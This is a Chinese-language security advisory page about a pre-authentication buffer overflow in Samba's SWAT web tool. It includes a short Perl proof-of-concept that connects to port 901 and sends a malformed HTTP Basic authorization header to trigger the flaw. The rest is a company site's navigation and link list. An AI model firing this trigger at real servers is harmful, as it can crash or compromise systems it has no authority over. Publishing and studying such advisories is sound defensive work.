受影响系统

详细描述SWAT是Samba Web管理工具。 Samba SWAT服务预验证存在缓冲区溢出问题，远程攻击者可以利用这个漏洞在系统上以SWAT进程权限执行任意指令。问题存在于source/lib/util_str.c文件中的进行HTTP Basic验证的base64_decode_data_blob函数中.测试代码#!/usr/bin/perl# Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow# Created by Noam Rathaus of Beyond Security Ltd.#use IO::Socket;use strict;my $host = $ARGV[0];my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "901" );unless ($remote) { die "cannot connect to http daemon on $host" }print "connected/n";$remote->autoflush(1);my $http = "GET / HTTP/1.1/rHost: $host:901/rUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 Firefox/0.9.1/rAccept: text/xml/rAccept-Language: en-us,en;q=0.5/rAccept-Encoding: gzip,deflate/rAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7/rKeep-Alive: 300/rConnection: keep-alive/rAuthorization: Basic =/r/r";print "HTTP: [$http]/n";print $remote $http;sleep(1);print "Sent/n";while (<$remote>){print $_;}print "/n";close $remote;

快速导航

• 首页
• 解决方案
• 关于我们
• 客户案例
• 开发方案
• 新闻资讯
• 技术支持
• 联系我们

友情链接

6miu / 6miu盘 / 6miu盘搜 / 6miu专利网 / 发米网 / 8miu发米网 / win发米网 / mac技术网 / win8发米网 / 苹果发米网 / 8miu技术网 / 哎哟喂啊 / 抖音营销 / 发米吧 / 整形 / 去发米网 / famiwei专利网 / 8wiu专利网 / 发米友 / 发米论剑 / WP发米网 / TC发米网 / 6miu博客 / 塞班发米网 / 黑莓发米网 / 爱pad发米网 / 网盘搜索 / 55bbs / 整容 / 美容 / 整容哪家好 / 微整形 / 招标网 / Kongfu / ORACLE / 钉钉服务商 / 智慧屏 / 深信服防火墙 / SAP / oracle / 深信服 / maxhub / 希沃 / 防火墙 / ideaHub / 信创 / 阅片宝 / SAP / MES / PLM / SCM / 钉钉 /

联系方式

• 地址：成都市人民南路四段成科西路三号省计算机研究院
• 电话：18215660330
• 网址：www.8miu.fun
• 邮箱：179001057@qq.com

Copyright 2010-2020 成都软件开发